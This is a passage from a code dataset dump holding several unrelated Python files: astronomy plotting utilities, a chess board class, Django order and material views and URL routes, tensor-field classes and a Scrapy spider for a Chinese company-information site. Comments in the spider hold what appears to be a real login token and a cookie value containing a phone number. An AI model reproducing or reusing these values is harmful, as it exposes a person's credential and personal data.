2.1) & (aux[\"PROB\"] > prob_low)))][\"Z_TRUE\"],\n aux[(aux[\"CLASS_PERSON\"] == 1) &\n (((aux[\"Z_TRY\"] >= 2.1) & (aux[\"PROB\"] > prob_high)) |\n ((aux[\"Z_TRY\"] < 2.1) & (aux[\"PROB\"] > prob_low)))][\"Z_TRY\"],\n label=\"star\",\n zorder=3,\n marker=\"s\",\n s=markersize2)\n\n if lines is not None:\n z = np.arange(0, 5, 0.5)\n for line1 in lines.index:\n for line2 in lines.index:\n if line1 == line2 or (line1, line2) in exclude_line_pairs:\n continue\n z_line1_as_line2 = (\n LINES[\"WAVE\"][line1] / LINES[\"WAVE\"][line2] *\n (1 + z) - 1)\n ax.plot(z_line1_as_line2,\n z,\n label=f\"real: {line1}; assumed: {line2}\")\n\n ax.legend(numpoints=1, fontsize=labelsize, loc='lower right')\n\n xlim = np.array((0, 4))\n ax.fill_between([0.0, 2.1], [0.0, 0.0], [2.1, 2.1],\n color=\"k\",\n alpha=0.1,\n zorder=0)\n ax.fill_between([2.1, xlim[1]], [2.1, 2.1], [xlim[1], xlim[1]],\n color=\"k\",\n alpha=0.1,\n zorder=0)\n ax.plot(xlim, xlim, \"r-\")\n ax.fill_between(xlim,\n xlim + delta_z,\n xlim - delta_z,\n color=\"r\",\n alpha=0.2,\n zorder=0)\n ax.set_xlim(xlim)\n ax.set_ylim(xlim)\n ax.set_xlabel(r\"$z_{\\rm true}$\", fontsize=fontsize)\n ax.set_ylabel(r\"$z_{\\rm try}$\", fontsize=fontsize)\n ax.set_title(fr\"${rmag_min:.1f} < r \\leq {rmag_max:.1f}$\",\n fontsize=fontsize)\n ax.tick_params(labelsize=labelsize, size=ticksize, width=tickwidth)\n\n col_index += 1\n if col_index == ncols:\n col_index = 0\n row_index += 1\n\n\ndef multiline(x_coordinates,\n y_coordinates,\n color_coordinates,\n ax=None,\n **kwargs):\n \"\"\"Plot lines with different colorings\n\n Arguments\n ---------\n x_coordinates: 2d array of float\n Array containing x coordinates for each of the lines\n\n y_coordinates: 2d array of float\n Array containing y coordinates for each of the lines\n\n color_coordinates: 1d array of float\n Array containing numbers mapped to colormap\n\n ax: plt.Axes or None - default: None\n Axes to plot on. If None, then create new axes\n\n **kwargs\n Keyword arguments passed to LineCollection\n\n Notes\n -----\n len(x_coordinates) == len(y_coordinates) == len(color_coordinates) is the\n number of line segments\n\n len(x_coordinates[index]) == len(y_coordinates[index]) is the number of\n points for each line (indexed by i)\n\n Return\n ------\n line_collection: LineCollection\n LineCollection instance.\n \"\"\"\n\n # find axes\n ax = plt.gca() if ax is None else ax\n\n # create LineCollection\n segments = [\n np.column_stack([x, y]) for x, y in zip(x_coordinates, y_coordinates)\n ]\n line_collection = LineCollection(segments, **kwargs)\n\n # set coloring of line segments\n line_collection.set_array(np.asarray(color_coordinates))\n\n # add lines to axes and rescale\n # Note: adding a collection doesn't autoscalee xlim/ylim\n ax.add_collection(line_collection)\n ax.autoscale()\n\n return line_collection\n\n\ndef plot_peaks(spectra,\n peak_finders,\n labels,\n markers,\n offset=1.0,\n ontop=True,\n plot_lines=True,\n emission_lines=LINES,\n add_legend=False):\n \"\"\" Plot the peaks found by one or more peak finder instances\n All peak finders accepted by SQUEzE can be passed\n\n Arguments\n ---------\n spectra: Spectra\n An instance of Spectra with the spectra to plot\n\n peak_finder: list\n A list of valid peak finder instances.\n\n labels: list of str\n Labels of the different peak finders. Must have same length as peak_finder\n\n markers: list of str\n Matplotlib marker strings for the different peak finders\n\n offset: float or list of float - Default: 1.0\n Offset of the peak markers. Offset is computed by multiplying the flux\n by the value in offset. If a float, use the same value for all peak\n finders. If a list, must have same length as peak_finder. The peaks of each\n peak finder will be offset using the respective offset\n\n plot_lines: bool - Default: True\n If True, overplot the position of the emision lines in the spectra of\n quasars and galaxies\n\n emission_lines: pd.DataFrame - Default: LINES\n Emission lines to plot. Format is a datframe with the field \"WAVE\" with\n the rest-frame wavelength of the lines.\n\n add_legend: boolean - Default: False\n If True, then plot the plot legend\n \"\"\"\n if len(peak_finders) > len(COLOR_LIST):\n print(\"Too many items to plot. Either add more colors to the list or \"\n \"else remove some items to plot\")\n return\n assert len(peak_finders) == len(labels)\n assert len(peak_finders) == len(markers)\n assert isinstance(offset, float) or len(peak_finders) == len(offset)\n if isinstance(offset, float):\n offset = [offset] * len(peak_finders)\n\n num_spectra = spectra.size()\n\n # plot options\n fontsize = 14\n labelsize = 12\n ticksize = 8\n tickwidth = 2\n pad = 6\n ncols = 2\n nrows = num_spectra // 2\n if num_spectra % 2 > 0:\n nrows += 1\n figsize = (13, 5 * nrows)\n fig = plt.figure(figsize=figsize)\n if add_legend:\n gs = fig.add_gridspec(nrows=nrows + 1, ncols=ncols)\n else:\n gs = fig.add_gridspec(nrows=nrows, ncols=ncols)\n gs.update(wspace=0.25,\n hspace=0.4,\n bottom=0.15,\n left=0.1,\n right=0.95,\n top=0.9)\n axes = [\n fig.add_subplot(gs[index_row, index_col])\n for index_row in range(nrows)\n for index_col in range(ncols)\n ]\n if add_legend:\n ax_legend = fig.add_subplot(gs[-1, :])\n\n lines = []\n for index, (ax, spectrum) in enumerate(zip(axes, spectra.spectra_list)):\n specid = spectrum.metadata_by_key(\"SPECID\")\n rmag = spectrum.metadata_by_key(\"R_MAG\")\n z_true = spectrum.metadata_by_key(\"Z_TRUE\")\n class_person = spectrum.metadata_by_key(\"CLASS_PERSON\")\n\n if index == 0:\n lines += ax.plot(\n spectrum.wave,\n spectrum.flux,\n color=\"k\",\n linestyle=\"-\",\n label=\"spectrum\"\n )\n ax.errorbar(\n spectrum.wave,\n spectrum.flux,\n yerr=1/np.sqrt(spectrum.ivar),\n color=\"k\",\n linestyle=\"-\")\n ax.set_title(f\"SPECID: {specid}, R_MAG: {rmag}, Z_TRUE: {z_true:.2f}\",\n fontsize=labelsize)\n\n for index_pf, peak_finder in enumerate(peak_finders):\n peaks, _ = peak_finder.find_peaks(spectrum)\n if index == 0:\n if ontop:\n ymax = np.max(spectrum.flux)\n lines += ax.plot(spectrum.wave[peaks],\n [ymax * offset[index_pf]] *\n spectrum.wave[peaks].size,\n color=COLOR_LIST[index_pf],\n linestyle='',\n marker=markers[index_pf],\n label=f\"{labels[index_pf]} peaks\")\n else:\n lines += ax.plot(spectrum.wave[peaks],\n spectrum.flux[peaks] * offset[index_pf],\n color=COLOR_LIST[index_pf],\n linestyle='',\n marker=markers[index_pf],\n label=f\"{labels[index_pf]} peaks\")\n else:\n if ontop:\n ymax = np.max(spectrum.flux)\n ax.plot(spectrum.wave[peaks], [ymax * offset[index_pf]] *\n spectrum.wave[peaks].size,\n color=COLOR_LIST[index_pf],\n linestyle='',\n marker=markers[index_pf],\n label=f\"{labels[index_pf]} peaks\")\n else:\n ax.plot(spectrum.wave[peaks],\n spectrum.flux[peaks] * offset[index_pf],\n color=COLOR_LIST[index_pf],\n linestyle='',\n marker=markers[index_pf])\n\n if plot_lines and class_person in [3, 4]:\n ylim = ax.get_ylim()\n xlim = ax.get_xlim()\n emission_lines_observed_frame = emission_lines[\"WAVE\"].values * (\n 1 + z_true)\n w = np.where((xlim[0] < emission_lines_observed_frame) &\n (emission_lines_observed_frame < xlim[1]))\n ax.vlines(emission_lines_observed_frame[w],\n ylim[0],\n ylim[1],\n colors=\"k\",\n linestyle='--',\n alpha=0.5)\n ax.set_ylim(ylim)\n\n # axis settings, labels\n for ax in axes:\n ax.set_ylabel(r\"flux\", fontsize=fontsize)\n ax.set_xlabel(r\"wavelength [${\\rm \\AA}$]\", fontsize=fontsize)\n ax.tick_params(labelsize=labelsize,\n size=ticksize,\n width=tickwidth,\n pad=pad,\n left=True,\n right=False,\n labelleft=True,\n labelright=False)\n\n # legend\n if add_legend:\n labels = [lns.get_label() for lns in lines]\n ax_legend.legend(lines, labels, ncol=3, loc=9, fontsize=fontsize)\n ax_legend.axis('off')\n\n\ndef plot_peakfinder_stats_vs_magnitude(mag_cuts,\n significance_cut_vs_mag,\n completeness_vs_mag,\n num_spectra_vs_mag,\n num_spectra_qso_vs_mag,\n num_entries_vs_mag,\n num_correct_entries_vs_mag,\n significance_cut_lim=None,\n completeness_lim=None,\n title=None):\n \"\"\"\n Plot Peak Finder statistics as a function of magnitude cuts.\n\n Statistics plotted are the completeness after peak finder and the number\n of trial redshifts per spectrum (all trial redshifts as solid lines and\n correct trial redshfit as dashed lines).\n\n Format of the arrays should be the same as the outputs from\n compute_peak_finder_completeness_vs_mag (see stats_utils.py)\n\n Arguments\n ---------\n mag_cuts: list of float\n The used magnitude cuts\n\n significance_cut: 1d array of float\n The significance cuts used to compute the completeness for each magnitude cut\n\n completeness_vs_mag: 2d array of float\n Completeness considering the entries that meet the each significance and magnitude cuts\n\n num_spectra_vs_mag: 1d array of int\n Number of spectra as for each magnitude cut\n\n num_entries_vs_mag: 2d array of float\n The number of entries in the dataframe that meet the significance and magnitude cuts\n\n num_correct_entries_vs_mag: 2d array of float\n The number of entries in the dataframe that meet the significance and magnitude cuts\n and corresponds to quasars with the correct redshift\n\n significance_cut_lim: (float, float) or None - Default: None\n Significance cut range to show in the plot. If None, use the automatic choice\n\n completeness_lim: (float, float) or None - Default: None\n Completeness range to show in the plot. If None, use the automatic choice\n\n title: str or None - Default: None\n If not None, add this as plot title\n \"\"\"\n\n fontsize = 18\n labelsize = 14\n ticksize = 8\n tickwitdh = 2\n figsize = (12, 5)\n fig = plt.figure(figsize=figsize)\n gs = fig.add_gridspec(1, 3, hspace=0., wspace=0.5, width_ratios=[10, 10, 1])\n\n ax = fig.add_subplot(gs[0])\n ax2 = fig.add_subplot(gs[1])\n ax3 = fig.add_subplot(gs[2])\n\n cmap = \"viridis\"\n\n line_collection = multiline(significance_cut_vs_mag,\n completeness_vs_mag,\n mag_cuts,\n ax=ax,\n cmap=cmap)\n multiline(significance_cut_vs_mag,\n num_entries_vs_mag / num_spectra_vs_mag,\n mag_cuts,\n ax=ax2,\n cmap=cmap)\n multiline(significance_cut_vs_mag,\n num_correct_entries_vs_mag /\n num_spectra_qso_vs_mag,\n mag_cuts,\n ax=ax2,\n cmap=cmap,\n linestyle=\"dashed\")\n\n ax.tick_params(labelsize=labelsize, size=ticksize, width=tickwitdh)\n ax.set_xlabel(\"min. peak significance\", fontsize=fontsize)\n ax.set_ylabel(\"max. completeness\", fontsize=fontsize)\n\n ax2.set_ylabel(\"num. trial redshift/spectrum\", fontsize=fontsize)\n ax2.set_xlabel(\"min. peak significance\", fontsize=fontsize)\n ax2.tick_params(labelsize=labelsize, size=ticksize, width=tickwitdh)\n\n fig.colorbar(line_collection, cax=ax3, shrink=0.8)\n ax3.yaxis.set_label_position('left')\n ax3.set_ylabel(\"magnitude cut\", fontsize=fontsize)\n ax3.tick_params(labelsize=labelsize,\n size=ticksize,\n width=tickwitdh,\n left=True,\n right=False,\n labelleft=True,\n labelright=False)\n\n if completeness_lim is not None:\n ax.set_ylim(completeness_lim)\n if significance_cut_lim is not None:\n ax.set_xlim(significance_cut_lim)\n ax2.set_xlim(significance_cut_lim)\n if title is not None:\n fig.suptitle(title, fontsize=fontsize)\n\n\ndef redshift_precision_histogram(df, mag_bins, title=None,\n bins=np.arange(-2e4, 2e4, 750)):\n \"\"\" Plot the redshift precision histogram. Also print a table summarising\n the precision.\n\n Arguments\n ---------\n df: pd.DataFrame\n The catalogue\n\n mag_bins: list of float\n List of the magnitude limits in each bins. For example [18, 20, 22]\n has two bins: from 18 to 20 and from 20 to 22.\n\n bins: array of float - Default: np.arange(-2e4, 2e4, 750)\n These are the histogram bins.\n\n title: str or None - Default: None\n If not None, then add title as the plot title\n \"\"\"\n # plot options\n figsize = (5, 5)\n fontsize = 16\n labelsize = 12\n ticksize = 8\n tickwidth = 2\n pad = 6\n ncols = 1\n nrows = 1\n fig = plt.figure(figsize=figsize)\n gs = fig.add_gridspec(nrows=nrows, ncols=ncols)\n gs.update(wspace=0., hspace=0.2, bottom=0.15, left=0.1, right=0.95, top=0.9)\n ax = fig.add_subplot(gs[0])\n\n redsfhit_precision = {\n \"mag bin\": [],\n r\"$\\overline{\\Delta v}$ [km/s]\": [],\n r\"$\\sigma_{\\Delta v}$ [km/s]\": [],\n r\"100$\\sigma_{\\rm NMAD}$\": [],\n \"$N$\": [],\n }\n\n if \"DELTA_V\" not in df.columns:\n df[\"DELTA_V\"] = df[\"DELTA_Z\"] / (1 + df[\"Z_TRUE\"]) * 3e5\n\n for rmag_min, rmag_max in zip(mag_bins[:-1], mag_bins[1:]):\n\n aux = df[(df[\"R_MAG\"] > rmag_min) & (df[\"R_MAG\"] <= rmag_max) &\n (df[\"IS_CORRECT\"])]\n\n ax.hist(aux[\"DELTA_V\"],\n bins=bins,\n label=fr\"${rmag_min:.1f} < r \\leq {rmag_max:.1f}$\",\n histtype=\"step\",\n density=True,\n )\n\n redsfhit_precision[\"mag bin\"].append(\n fr\"${rmag_min:.1f} < r \\leq {rmag_max:.1f}$\")\n redsfhit_precision[r\"$\\overline{\\Delta v}$ [km/s]\"].append(\n aux['DELTA_V'].mean())\n redsfhit_precision[r\"$\\sigma_{\\Delta v}$ [km/s]\"].append(\n aux['DELTA_V'].std())\n redsfhit_precision[r\"100$\\sigma_{\\rm NMAD}$\"].append(\n np.fabs(aux['DELTA_V']).median()/3e5*1.48*100)\n redsfhit_precision[\"$N$\"].append(\n aux.shape[0])\n\n ax.set_xlabel(r\"$\\Delta v$ [km/s]\", fontsize=fontsize)\n ax.set_ylabel(r\"normalized counts\", fontsize=fontsize)\n if title is not None:\n ax.set_title(title, fontsize=fontsize)\n ax.tick_params(labelsize=labelsize, pad=pad, size=ticksize, width=tickwidth)\n\n ax.legend(numpoints=1, fontsize=labelsize, loc=\"upper left\")\n\n redsfhit_precision_df = pd.DataFrame(redsfhit_precision)\n latex = redsfhit_precision_df.to_latex(\n index=False,\n escape=False,\n column_format=\"c\" * redsfhit_precision_df.shape[0],\n float_format='{:,.2f}'.format,\n )\n latex = re.sub(r\"cline{\\d-\\d}\", r\"midrule\", latex)\n print(latex)\n return redsfhit_precision_df\n","repo_name":"iprafols/SQUEzE","sub_path":"py/squeze/plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":31336,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"16062301351","text":"class Piece():\n def __init__(self, piecetype, side, alive=True):\n self.piecetype = piecetype\n self.side = side\n self.alive = alive\n\nclass Board():\n def __init__(self):\n background = [[0 for i in range(8)] for j in range(8)]\n toggle = True\n for i in range(8):\n if i%2 == 1:\n toggle = False\n else:\n toggle = True\n for j in range(8):\n if toggle:\n toggle = False\n else:\n background[i][j] = 1\n toggle = True\n self.board = background\n def create_pieces(self):\n wRook1 = Piece(\"r\",\"w\")\n wRook2 = Piece(\"r\", \"w\")\n wKnight1 = Piece(\"k\", \"w\")\n wKnight2 = Piece(\"k\", \"w\")\n wBishop1 = Piece(\"b\", \"w\")\n wBishop2 = Piece(\"b\", \"w\")\n wQueen = Piece(\"q\", \"w\")\n wKing = Piece(\"k\", \"w\")\n bRook1 = Piece(\"r\",\"b\")\n bRook2 = Piece(\"r\", \"b\")\n bKnight1 = Piece(\"k\", \"b\")\n bKnight2 = Piece(\"k\", \"b\")\n bBishop1 = Piece(\"b\", \"b\")\n bBishop2 = Piece(\"b\", \"b\")\n bQueen = Piece(\"q\", \"b\")\n bKing = Piece(\"k\", \"b\")\n wPawn1 = Piece(\"p\",\"w\")\n wPawn2 = Piece(\"p\",\"w\")\n wPawn3 = Piece(\"p\",\"w\")\n wPawn4 = Piece(\"p\",\"w\")\n wPawn5 = Piece(\"p\",\"w\")\n wPawn6 = Piece(\"p\",\"w\")\n wPawn7 = Piece(\"p\",\"w\")\n wPawn8 = Piece(\"p\",\"w\")\n bPawn1 = Piece(\"p\",\"b\")\n bPawn2 = Piece(\"p\",\"b\")\n bPawn3 = Piece(\"p\",\"b\")\n bPawn4 = Piece(\"p\",\"b\")\n bPawn5 = Piece(\"p\",\"b\")\n bPawn6 = Piece(\"p\",\"b\")\n bPawn7 = Piece(\"p\",\"b\")\n bPawn8 = Piece(\"p\",\"b\")\n def set_board(self):\n board_state = [['' for i in range(8)] for i in range(8)]\n board_state[0][0] = bRook1\n board_state[0][1] = bKnight1\n board_state[0][2] = bBishop1\n board_state[0][3] = bQueen\n board_state[0][4] = bKing\n board_state[0][5] = bBishop1\n board_state[0][6] = bKnight1\n board_state[0][7] = bRook1\n board_state[7][0] = wRook1\n board_state[7][1] = wKnight1\n board_state[7][2] = wBishop1\n board_state[7][3] = wQueen\n board_state[7][4] = wKing\n board_state[7][5] = wBishop1\n board_state[7][6] = wKnight1\n board_state[7][7] = wRook1\n print(board_state)\n\n\n\n\n\nnewBoard = Board()\nprint(newBoard.board)\nnewBoard.create_pieces()\nnewBoard.set_board()\n ","repo_name":"tartlet/Chess","sub_path":"bones.py","file_name":"bones.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34986319353","text":"#!/usr/bin/env python\n\n###################################################\n### Structural Features Background Generation ###\n### Written by: Nicole Zatorski ###\n### Last date modified: 22/7/22 ###\n###################################################\n\n# import statements\nimport sys\nimport os\nimport glob\n\n# functions\ndef write_output(out_name, out_str):\n '''\n Appends the out_str to the end of the file described by out_name\n Inputs:\n out_name: (str) path and name of file to write to\n out_str: (str) information to append to the end of the file\n Outputs:\n None\n '''\n f = open(out_name, 'a+')\n f.write(out_str)\n f.close()\n\ndef make_background(input_folder, file_id, output_dir_name):\n '''\n Converts the output from structural features into background that structural features can use\n Inputs:\n input_folder: (str) path where to find the file the background will be generated from\n file_id: (str) name of the file the bacground will be generated from\n output_dir_name: (str) path and name of file to write to, doesn't need to already exist but can\n Outputs:\n 1 (int) when complete\n '''\n if not os.path.exists('./databases/'+output_dir_name + '/'):\n os.makedirs('./databases/'+output_dir_name + '/')\n output_dir = './databases/'+output_dir_name + '/'\n out_average = ''\n index = 0\n with open(input_folder + '/average_'+file_id+'.csv') as fo:\n for line in fo:\n if index != 0:\n split_line = line[:-1].split(',')\n out_average = out_average + split_line[0] + ',' + split_line[1] + ',' + split_line[2] + '\\n'\n index +=1\n frequency = ''\n domain = ''\n fam = ''\n superfam =''\n fold = ''\n with open(input_folder + '/frequency_'+file_id+'.csv') as fo:\n for line in fo:\n split_line = line[:-1].split(',')\n if split_line[2] == 'N/A':\n frequency = frequency + split_line[1] + ',' + split_line[3] + '\\n'\n elif split_line[2] == 'domain':\n domain = domain + split_line[0] + ',' + split_line[3] + '\\n'\n elif split_line[2] == 'fold':\n fold = fold + split_line[0] + ',' + split_line[3] + '\\n'\n elif split_line[2] == 'family':\n fam = fam + split_line[0] + ',' + split_line[3] + '\\n'\n elif split_line[2] == 'superfamily':\n superfam = superfam + split_line[0] + ',' + split_line[3] + '\\n'\n write_output(output_dir +'average_background.csv' ,out_average)\n write_output(output_dir +'frequency_background.csv' ,frequency)\n write_output(output_dir +'scop.fold.csv' ,fold)\n write_output(output_dir +'ipr.domain.csv' ,domain)\n write_output(output_dir +'scop.family.csv' ,fam)\n write_output(output_dir +'scop.superfam.csv' ,superfam)\n\n return 1\n\nif __name__ == '__main__':\n make_background('prot_backout_cmap', 'prot_over', 'prot_over')\n make_background('prot_backout_cmap', 'prot_under', 'prot_under')\n # make_background('norm_breast', 'gtex_breast', 'gtex_breast250')\n # make_background(*sys.argv[1:])\n # make_background('nonbreast_gtex_out/', 'all_ids', 'updated_human_background')\n # files = glob.glob('rna_backout/*normal*')\n\n # # files = glob.glob('proteomics_backout/*')\n # for f in files:\n # # id = f.split('_')[-1].split('.')[0]\n # # make_background('proteomics_backout', id, id)\n\n\n # id = f.split('_')[-1].split('-')[0]\n # make_background('rna_backout', id+'-normal-tissue', id)","repo_name":"schlessinger-lab/structural_features","sub_path":"make_background.py","file_name":"make_background.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24067655270","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom bs4 import BeautifulSoup\nfrom scrapy.http import Request,FormRequest\nfrom tycproject.items import CompanyNameItem\nfrom scrapy.http.cookies import CookieJar\n\n\n\nclass TycSpider(scrapy.Spider):\n name = 'tycSpider'\n custom_settings = {\n 'DOWNLOAD_DELAY': 2,\n 'COOKIES_ENABLED' : False,\n 'DOWNLOADER_MIDDLEWARES':{\n 'tycproject.middlewares.SeleniumMiddleware': 543,\n 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None\n },\n # 'ITEM_PIPELINES':{\n # 'tycproject.mongodbPipelines.MongodbPipeline_Qiye58':300,\n # },\n #\n #\n }\n #\n # headers = {\n # 'Connection': 'keep - alive',\n # 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',\n # 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n # 'Referer':'https://www.tianyancha.com/',\n # 'Accept-Encoding':'gzip, deflate, br',\n # 'Accept-Language':'zh-CN,zh;q=0.9'\n # }\n # cookie_jar = CookieJar()\n\n def start_requests(self):\n url = 'https://www.tianyancha.com/'\n for i in range(1,2):\n yield Request(url, meta = {'usedSelenium': True,},callback = self.parse)\n\n def parse(self, response):\n # self.cookie_jar.extract_cookies(response, response.request)\n html=BeautifulSoup(response.text,'lxml')\n a=html.find(class_='right tyc-nav ')\n # print('~~~~~~~~~~~~~`~~~~~~~~~~~~~~~')\n # print(a)\n # print('aaaaaaaaaaaaaaaaaaaaaaaaaaaaa')\n # cookies=response.request.cookies\n # cookies['tyc-user-info']='%257B%2522token%2522%253A%2522eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIxODg5ODQwMDQ5NiIsImlhdCI6MTUzNzQyMjU2OSwiZXhwIjoxNTUyOTc0NTY5fQ.P2mZ8kCQKPhVlzxNpRDeBkDafxAA4HTxMC3Hs8Sj0fSGmIZrSjo_8LsnQpm_ZkCHZO8QoBeqf_GpqQtHFS8zTA%2522%252C%2522integrity%2522%253A%25220%2525%2522%252C%2522state%2522%253A%25220%2522%252C%2522redPoint%2522%253A%25220%2522%252C%2522vipManager%2522%253A%25220%2522%252C%2522vnum%2522%253A%25220%2522%252C%2522monitorUnreadCount%2522%253A%25221%2522%252C%2522onum%2522%253A%25220%2522%252C%2522mobile%2522%253A%252218898400496%2522%257D'\n # cookies['auth_token']='eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIxODg5ODQwMDQ5NiIsImlhdCI6MTUzNzQyMjU2OSwiZXhwIjoxNTUyOTc0NTY5fQ.P2mZ8kCQKPhVlzxNpRDeBkDafxAA4HTxMC3Hs8Sj0fSGmIZrSjo_8LsnQpm_ZkCHZO8QoBeqf_GpqQtHFS8zTA'\n # yield Request('https://www.tianyancha.com/cd/login.json', meta={'usedSelenium': False},callback=self.qqq,cookies=cookies)\n # def qqq(self,response):\n # print(response.text)\n\n","repo_name":"AFU1718/tyc_test","sub_path":"tycproject/tycSpider.py","file_name":"tycSpider.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22595740886","text":"from django.db.models import Q\r\nfrom rest_framework import viewsets, mixins\r\nfrom rest_framework.authentication import SessionAuthentication\r\nfrom rest_framework.pagination import PageNumberPagination\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.response import Response\r\nfrom rest_framework_jwt.authentication import JSONWebTokenAuthentication\r\n\r\nfrom order import serializers\r\nfrom order.models import Order, Material\r\nfrom utils.permissions import IsOwnerOrReadOnly\r\nfrom order.choices import Status\r\n\r\n\r\nclass Pagination(PageNumberPagination):\r\n \"\"\" 分页基础类 \"\"\"\r\n page_size = 10\r\n page_size_query_param = 'page_size'\r\n page_query_param = 'page'\r\n max_page_size = 100\r\n\r\n\r\nclass OrderViewset(viewsets.ModelViewSet):\r\n \"\"\" 订单管理 GET 查询 \"\"\"\r\n permission_classes = (IsAuthenticated, )\r\n authentication_classes = (JSONWebTokenAuthentication, SessionAuthentication)\r\n pagination_class = Pagination\r\n serializer_class = serializers.OrderSerializer\r\n\r\n def get_queryset(self):\r\n query = Q(is_valid=True, status=Status.STATUS_BL)\r\n customer = self.request.GET.get('customer', None)\r\n if customer:\r\n query = query & Q(customer__icontains=customer)\r\n start_time = self.request.GET.get('start_time', None)\r\n end_time = self.request.GET.get('end_time', None)\r\n if start_time and end_time:\r\n query = query & Q(created_at__range=(start_time, end_time))\r\n queryset = Order.objects.filter(query)\r\n return queryset\r\n\r\n\r\nclass OrderViewsetBL(mixins.ListModelMixin, mixins.UpdateModelMixin, viewsets.GenericViewSet):\r\n \"\"\" 订单 POST 备料 \"\"\"\r\n permission_classes = (IsAuthenticated, )\r\n authentication_classes = (JSONWebTokenAuthentication, SessionAuthentication)\r\n serializer_class = serializers.OrderSerializer\r\n queryset = Order.objects.all()\r\n\r\n def update(self, request, *args, **kwargs):\r\n instance = self.get_object()\r\n instance.status = Status.STATUS_PD\r\n instance.save()\r\n serializer = self.get_serializer(instance).data\r\n return Response(serializer)\r\n\r\n\r\nclass MaterialViewset(viewsets.ModelViewSet):\r\n \"\"\" 物料管理 \"\"\"\r\n permission_classes = (IsAuthenticated, IsOwnerOrReadOnly)\r\n authentication_classes = (JSONWebTokenAuthentication, SessionAuthentication)\r\n serializer_class = serializers.MaterialSerializer\r\n\r\n def get_queryset(self):\r\n queryset = Material.objects.all()\r\n return queryset\r\n\r\n\r\nclass OrderViewsetSC(mixins.ListModelMixin, mixins.UpdateModelMixin, viewsets.GenericViewSet):\r\n \"\"\" 订单 POST 生产相关操作 \"\"\"\r\n permission_classes = (IsAuthenticated, )\r\n authentication_classes = (JSONWebTokenAuthentication, SessionAuthentication)\r\n serializer_class = serializers.OrderSerializer\r\n queryset = Order.objects.all()\r\n\r\n def update(self, request, *args, **kwargs):\r\n instance = self.get_object()\r\n # 非订单完成状态,那么订单状态+1\r\n if instance.status != Status.STATUS_DDWC:\r\n instance.status += 1\r\n instance.save()\r\n serializer = self.get_serializer(instance).data\r\n return Response(serializer)\r\n","repo_name":"xxcfun/mes_api","sub_path":"apps/order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25791565891","text":"import numpy as np\n\nfrom .tensor_field import TensorField\n\n\nclass ScalarField(TensorField):\n\n def __new__(cls, value, param):\n obj = super().__new__(cls, value, param)\n rank = len(obj.shape) - len(obj.param.shape) + 1\n if rank > 1:\n raise ValueError(\n f\"Value is not scalar but rank {rank}\")\n elif rank == 1:\n obj = super().__new__(cls, value[0], param)\n return obj\n\n def calculate_gradient(self):\n \"\"\"Calculate gradient.\n\n Return:\n VectorField object.\n \"\"\"\n if 'gradient' in self.attributes:\n return self.attributes['gradient']\n diff1 = self.differentiate(order=1)\n grad = VectorField(\n np.concatenate([[d] for i, d in enumerate(diff1.values())]),\n param=self.param)\n self.attributes['gradient'] = grad\n return grad\n\n\nclass VectorField(TensorField):\n\n def __new__(cls, value, param):\n obj = super().__new__(cls, value, param)\n rank = len(obj.shape) - len(obj.param.shape) + 1\n if rank != 1:\n raise ValueError(f\"Value is not rank 1 but rank {rank}\")\n return obj\n\n def calculate_norm(self):\n \"\"\"Calculate norm.\n\n Return:\n ScalarField object.\n \"\"\"\n if 'norm' in self.attributes:\n return self.attributes['norm']\n norm = ScalarField(\n np.linalg.norm(self, axis=0, keepdims=True), param=self.param)\n self.attributes['norm'] = norm\n return norm\n\n\nclass MatrixField(TensorField):\n\n def __new__(cls, value, param):\n obj = super().__new__(cls, value, param)\n rank = len(obj.shape) - len(obj.param.shape) + 1\n if rank != 2:\n raise ValueError(f\"Value is not rank 2 but rank {rank}\")\n return obj\n\n def calculate_determinant(self):\n if 'determinant' in self.attributes:\n return self.attributes['determinant']\n det = ScalarField(np.linalg.det(self.transpose()), param=self.param)\n self.attributes['determinant'] = det\n return det\n","repo_name":"yellowshippo/geomulator","sub_path":"geomulator/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18365648815","text":"from django.conf.urls import url\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n url(r'^$', views.index),\r\n url(r'^details/(?P[0-9]+)$', views.DogDetailView.as_view(),name='dogdetails'),\r\n url(r'^reg2/', views.register),\r\n url(r'^dogls/', views.DogLsView.as_view()),\r\n url(r'^dognew/', views.DogCreateView.as_view()),\r\n url(r'^dogupd/(?P[0-9]+)',views.DogUpdateView.as_view()),\r\n url(r'^dogmix/(?P[0-9]+)',views.DogMixView.as_view()),\r\n\r\n url(r'^reg/', views.reg),\r\n url(r'^dogform/', views.dogform),\r\n url(r'^formset/', views.formset),\r\n\r\n url(r'^dogs/(?P[0-9]+)$', views.DogDetailView.as_view())\r\n ]","repo_name":"tianyi666/DJ","sub_path":"Dj666/vft/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31899853802","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 8 12:26:29 2020\n\n@author: youpele\n\"\"\"\n\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom statistics import 